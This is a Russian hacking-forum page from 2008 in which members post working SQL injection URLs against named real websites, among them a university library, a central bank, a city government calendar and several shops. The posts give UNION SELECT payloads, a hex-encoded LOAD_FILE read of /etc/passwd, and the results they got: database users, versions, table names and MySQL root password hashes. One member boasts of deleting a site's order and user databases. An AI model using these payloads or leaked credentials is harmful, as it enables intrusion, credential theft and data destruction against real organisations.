ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4941  
Старый 27.02.2008, 13:22
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию

fantastic.library.cornell.edu


Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user(),database(),version()),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
user() = fan@localhost
database() - fantastic
version() - 4.1.7-standart

Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12/*
Код:
http://fantastic.library.cornell.edu/imagerecord_l.php?record=6+union+select+concat_ws(0x3a3a3a,user,password),2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
Смотрим исходник =)
 
Ответить с цитированием

  #4942  
Старый 27.02.2008, 14:19
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487

Репутация: 46
По умолчанию

FreeBSD Forum!!

Цитата:
http://www.bsdforums.org/forums/items/main.php?type=-1%20union%20select%201,user(),3,4,5,6,7,8,9,10,11, 12,13--
cycyouth.org ROOT

Цитата:
http://www.cycyouth.org/main.php?pgID=-1%20union%20select%201,concat(user,0x3a,password,0 x3a,file_priv),3,4,5,6,7,8,9,10+from+mysql.user--
root:*D4F86802E5F140FEA24A52DF0D5B9B0381A5119D:Y

tukums.lv ROOT

Цитата:
http://aa.tukums.lv/Default.asp?id=-1%20union%20select%201,2,password,4,5,6,7,8,9+from +mysql.user--
*923518145726A3E8F9098E43D6A56C2BC44BD1DC
 
Ответить с цитированием

  #4943  
Старый 27.02.2008, 18:10
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Внимание!!!
никто никогда не хотел себе швейцарские часы?
теперь вы можете себе такое позволить :-D
---------------------------------------------------------------
шоп специализирующийся на продаже швейцарских часов
----------------------------------------------------------------
http://www.deka.dn.ua/navigation.php?nav_id=-8+union+select+1,2,3,4,5,6,concat(version(),0x3a,u ser(),0x3a,database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29/*

4.0.24-log:bazik@localhost:deka
---------------------------------------------------------------
письмо админу отправил

Последний раз редактировалось samarin; 27.02.2008 в 18:22..
 
Ответить с цитированием

Карейдзы нах!
  #4944  
Старый 27.02.2008, 18:33
AlexGT
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
629558

Репутация: 52
Отправить сообщение для AlexGT с помощью ICQ
Talking Карейдзы нах!

После часика мучений удалос убить базу заказоф и юзероф и добавить новай тур = )

http://img264.imageshack.us/my.php?image=kareidzigz5.jpg
 
Ответить с цитированием

  #4945  
Старый 27.02.2008, 22:50
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

computergiants.com Шоп....Просто Шоп
_http://www.computergiants.com/stores/sitelet.asp?siteletid=-1'%66%72%6f%6d+1,2/*
 
Ответить с цитированием

  #4946  
Старый 27.02.2008, 23:40
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Светотехника
http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user( ),database()),3/*

5.0.32-Debian_7etch1-log:firstline_base@77.221.130.10:firstline_base

имена таблиц странные:

2103_forum_auth_access
2103_forum_banlist
2103_forum_categories
2103_forum_config
2103_forum_confirm
2103_forum_disallow
2103_forum_forum_prune
2103_forum_forums
2103_forum_groups
2103_forum_posts
2103_forum_privmsgs
2103_forum_privmsgs_text
2103_forum_ranks
2103_forum_sessions_keys
2103_forum_user_group

2103_forum_users
 
Ответить с цитированием

  #4947  
Старый 28.02.2008, 00:38
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Туристическое снаряжение
-------------------------------------
http://www.alexikaoutdoor.com.ua/product.php?prod_id=-177+union+select+1,2,3,4,5,6,7,8,9,10/*
4.0.27-standard-log:dumala2_alexikaoutdoor:dumala2_axbase@localhos t
 
Ответить с цитированием

  #4948  
Старый 28.02.2008, 01:37
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

Код:
http://www.hpol.org/transcript.php?id=-72+union+select+null,user(),version(),null,version()/*
user:ro@localhost
ver:5.0.27
db:hpol
нет file_priv !
 
Ответить с цитированием

  #4949  
Старый 28.02.2008, 16:34
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

банк
_http://www.eccb-centralbank.org/News/press.asp?offset= -1' SE LECT TABL E_SCHEMA,COLUMN_NAME FROM INFORMATION_SCH EMA.COLUMNS
 
Ответить с цитированием

  #4950  
Старый 28.02.2008, 17:50
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

brocken.de
Код HTML:
http://www.brocken.de/community/pinnwand/pinnwand.php?IDMBTH=-12+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10/*&UID=0&tx=1203010570&chat=
brocken@localhost:4.1.22-log:brocken_community
---------------------------------------------------------
ci.emeryville.ca.us
Код HTML:
http://www.ci.emeryville.ca.us/calendar/print/week.php?cid=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7/*&catid=1&d=&w=4&m=-14&y=2006
jpc_nixc0re@mimas.abag.ca.gov:4.1.20:mysql
Код HTML:
http://www.ci.emeryville.ca.us/calendar/week.php?cid=-1+union+select+0,1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/*
root:13d6f0d419ea128c
---------------------------------------------------------
wcfcroquet.org
Код HTML:
http://www.wcfcroquet.org/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1
wcf@193.111.201.122:4.1.10a:wcfcal
---------------------------------------------------------
phplite.com
Код HTML:
http://www.phplite.com/products/calendarexpress/demo/admin/userdetails.php?uid=-9+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8/*
phplite@localhost:4.1.22-standard:cosmo_ce2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ